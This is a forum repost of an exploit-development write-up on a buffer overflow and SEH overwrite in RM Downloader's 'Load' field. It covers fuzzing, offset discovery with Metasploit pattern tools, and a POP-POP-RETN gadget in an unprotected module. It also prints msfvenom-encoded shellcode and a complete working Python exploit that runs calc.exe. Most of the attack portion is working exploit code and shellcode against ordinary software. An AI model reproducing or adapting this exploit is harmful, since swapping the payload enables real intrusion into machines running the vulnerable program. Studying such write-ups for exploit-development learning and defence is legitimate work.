Kev Posted April 23, 2020 Report Posted April 23, 2020 Preamble The other day, i was gathering through Exploit-DB as usual, when i came across with this exploit, interested, i was eager to know if i could find a vulnerability. As a result of my success, i will explain the finding. The Bug RM Downloader suffers from a Buffer Overflow and a Structured Exception Handling Overwrite when inputting long strings within the ‘Load’ parameter. A small fuzzing script is generated: import struct buffer = "A" * 10000 f = open ("poc.txt", "w") f.write(buffer) f.close() Once the script is executed, the file is created: In order to crash the application with the generated bytes, open the ‘Load’ tab, and paste the contents within the ‘Load’ parameter: Once this is done, click OK. Two additional messageboxes may appear, just click OK. After this is done the application successfully crashes: Voila! The EIP has been successfully written. Moreover, the SEH Chains has suffered from an overwrite as well: This application could easily be exploited with the use of a JMP/CALL ESP or PUSH ESP, RET. However, as like SEH Overwrites more, i will perform one on this case. A pattern is generated and saved into a file named “pattern”: root@whitecr0wz:~/Exploit-Dev# msf-pattern_create -l 10000 > pattern root@whitecr0wz:~/Exploit-Dev# The contents of the file “pattern” are copied and pasted within the ‘Load’ parameter, repeting the process: After the SEH Chain values have been overwritten, the nSEH value is copied: The offset is calculated with msf-pattern_offset: root@whitecr0wz:~/Exploit-Dev# msf-pattern_offset -q 336F4C32 -l 10000 [*] Exact match at offset 9008 root@whitecr0wz:~/Exploit-Dev# The PoC is updated: import struct buffer = "A" * 9008 + "BBBB" + "CCCC" f = open ("poc.txt", "w") f.write(buffer) f.close() If the script works as intended, the nSEH value should be 42424242 (BBBB) and the SEH value 43434343 (CCCC): Good, in an escenario like this, a 3-byte SEH Overwrite could be performed, in case there are no available addresses without a NULL-byte. The modules are listed: As seen, the module RDfilter03 does not have any kind of protections/mitigations. Moreover, the base address does not contain a NULL- byte. Listing the POP-POP-RETN sequences: The first address (0x10031779) was chosen. The PoC is updated: import struct nseh = struct.pack("<I", 0x06710870) seh = struct.pack("<I", 0x10031779) buffer = "A" * 9008 + nseh + seh + "\xff" * 200 f = open ("poc.txt", "w") f.write(buffer) f.close() After repeating the process, the SEH Chain values are overwritten as expected: After pressing SHIFT+F9 (Run), the additional bytes are executed: Shellcode is generated: root@whitecr0wz:~/Exploit-Dev# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/alpha_mixed x86/alpha_mixed succeeded with size 448 (iteration=0) x86/alpha_mixed chosen with final size 448 Payload size: 448 bytes Final size of py file: 2188 bytes buf = b"" buf += b"\x89\xe6\xdb\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6a\x48\x6b" buf += b"\x32\x37\x70\x53\x30\x45\x50\x71\x70\x4c\x49\x79\x75" buf += b"\x75\x61\x6b\x70\x32\x44\x4c\x4b\x72\x70\x74\x70\x6c" buf += b"\x4b\x53\x62\x46\x6c\x6c\x4b\x33\x62\x45\x44\x6c\x4b" buf += b"\x30\x72\x76\x48\x36\x6f\x6e\x57\x53\x7a\x64\x66\x70" buf += b"\x31\x49\x6f\x4e\x4c\x75\x6c\x45\x31\x33\x4c\x67\x72" buf += b"\x54\x6c\x71\x30\x4a\x61\x4a\x6f\x56\x6d\x46\x61\x59" buf += b"\x57\x6a\x42\x59\x62\x66\x32\x73\x67\x6e\x6b\x66\x32" buf += b"\x42\x30\x6c\x4b\x32\x6a\x45\x6c\x4e\x6b\x32\x6c\x56" buf += b"\x71\x63\x48\x68\x63\x50\x48\x35\x51\x6e\x31\x72\x71" buf += b"\x4c\x4b\x52\x79\x47\x50\x67\x71\x79\x43\x6e\x6b\x31" buf += b"\x59\x64\x58\x5a\x43\x77\x4a\x32\x69\x4e\x6b\x65\x64" buf += b"\x4e\x6b\x75\x51\x68\x56\x56\x51\x6b\x4f\x4c\x6c\x39" buf += b"\x51\x38\x4f\x64\x4d\x35\x51\x4f\x37\x57\x48\x49\x70" buf += b"\x51\x65\x59\x66\x55\x53\x71\x6d\x49\x68\x35\x6b\x73" buf += b"\x4d\x45\x74\x63\x45\x6b\x54\x32\x78\x4e\x6b\x42\x78" buf += b"\x36\x44\x56\x61\x48\x53\x43\x56\x6c\x4b\x46\x6c\x52" buf += b"\x6b\x4c\x4b\x63\x68\x47\x6c\x47\x71\x48\x53\x4e\x6b" buf += b"\x77\x74\x6e\x6b\x55\x51\x58\x50\x4f\x79\x63\x74\x45" buf += b"\x74\x36\x44\x31\x4b\x31\x4b\x31\x71\x72\x79\x43\x6a" buf += b"\x53\x61\x6b\x4f\x6b\x50\x63\x6f\x43\x6f\x42\x7a\x4c" buf += b"\x4b\x65\x42\x7a\x4b\x4e\x6d\x53\x6d\x33\x5a\x57\x71" buf += b"\x4e\x6d\x6d\x55\x4f\x42\x53\x30\x37\x70\x67\x70\x50" buf += b"\x50\x73\x58\x50\x31\x4e\x6b\x42\x4f\x6d\x57\x49\x6f" buf += b"\x78\x55\x6f\x4b\x69\x70\x75\x4d\x46\x4a\x77\x7a\x43" buf += b"\x58\x6e\x46\x4e\x75\x6f\x4d\x4d\x4d\x79\x6f\x49\x45" buf += b"\x55\x6c\x34\x46\x61\x6c\x76\x6a\x6b\x30\x39\x6b\x4d" buf += b"\x30\x71\x65\x64\x45\x6f\x4b\x42\x67\x65\x43\x43\x42" buf += b"\x42\x4f\x61\x7a\x45\x50\x31\x43\x6b\x4f\x7a\x75\x63" buf += b"\x53\x33\x51\x62\x4c\x73\x53\x56\x4e\x51\x75\x31\x68" buf += b"\x53\x55\x35\x50\x41\x41" EndGame Final Code: import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread # Payload size: 448 bytes buf = b"" buf += b"\x89\xe6\xdb\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6a\x48\x6b" buf += b"\x32\x37\x70\x53\x30\x45\x50\x71\x70\x4c\x49\x79\x75" buf += b"\x75\x61\x6b\x70\x32\x44\x4c\x4b\x72\x70\x74\x70\x6c" buf += b"\x4b\x53\x62\x46\x6c\x6c\x4b\x33\x62\x45\x44\x6c\x4b" buf += b"\x30\x72\x76\x48\x36\x6f\x6e\x57\x53\x7a\x64\x66\x70" buf += b"\x31\x49\x6f\x4e\x4c\x75\x6c\x45\x31\x33\x4c\x67\x72" buf += b"\x54\x6c\x71\x30\x4a\x61\x4a\x6f\x56\x6d\x46\x61\x59" buf += b"\x57\x6a\x42\x59\x62\x66\x32\x73\x67\x6e\x6b\x66\x32" buf += b"\x42\x30\x6c\x4b\x32\x6a\x45\x6c\x4e\x6b\x32\x6c\x56" buf += b"\x71\x63\x48\x68\x63\x50\x48\x35\x51\x6e\x31\x72\x71" buf += b"\x4c\x4b\x52\x79\x47\x50\x67\x71\x79\x43\x6e\x6b\x31" buf += b"\x59\x64\x58\x5a\x43\x77\x4a\x32\x69\x4e\x6b\x65\x64" buf += b"\x4e\x6b\x75\x51\x68\x56\x56\x51\x6b\x4f\x4c\x6c\x39" buf += b"\x51\x38\x4f\x64\x4d\x35\x51\x4f\x37\x57\x48\x49\x70" buf += b"\x51\x65\x59\x66\x55\x53\x71\x6d\x49\x68\x35\x6b\x73" buf += b"\x4d\x45\x74\x63\x45\x6b\x54\x32\x78\x4e\x6b\x42\x78" buf += b"\x36\x44\x56\x61\x48\x53\x43\x56\x6c\x4b\x46\x6c\x52" buf += b"\x6b\x4c\x4b\x63\x68\x47\x6c\x47\x71\x48\x53\x4e\x6b" buf += b"\x77\x74\x6e\x6b\x55\x51\x58\x50\x4f\x79\x63\x74\x45" buf += b"\x74\x36\x44\x31\x4b\x31\x4b\x31\x71\x72\x79\x43\x6a" buf += b"\x53\x61\x6b\x4f\x6b\x50\x63\x6f\x43\x6f\x42\x7a\x4c" buf += b"\x4b\x65\x42\x7a\x4b\x4e\x6d\x53\x6d\x33\x5a\x57\x71" buf += b"\x4e\x6d\x6d\x55\x4f\x42\x53\x30\x37\x70\x67\x70\x50" buf += b"\x50\x73\x58\x50\x31\x4e\x6b\x42\x4f\x6d\x57\x49\x6f" buf += b"\x78\x55\x6f\x4b\x69\x70\x75\x4d\x46\x4a\x77\x7a\x43" buf += b"\x58\x6e\x46\x4e\x75\x6f\x4d\x4d\x4d\x79\x6f\x49\x45" buf += b"\x55\x6c\x34\x46\x61\x6c\x76\x6a\x6b\x30\x39\x6b\x4d" buf += b"\x30\x71\x65\x64\x45\x6f\x4b\x42\x67\x65\x43\x43\x42" buf += b"\x42\x4f\x61\x7a\x45\x50\x31\x43\x6b\x4f\x7a\x75\x63" buf += b"\x53\x33\x51\x62\x4c\x73\x53\x56\x4e\x51\x75\x31\x68" buf += b"\x53\x55\x35\x50\x41\x41" nseh = struct.pack("<I", 0x06710870) seh = struct.pack("<I", 0x10031779) buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 5 + buf + "\xff" * 200 f = open ("poc.txt", "w") f.write(buffer) f.close() Source: hwhitecr0wz.github.io 1 Quote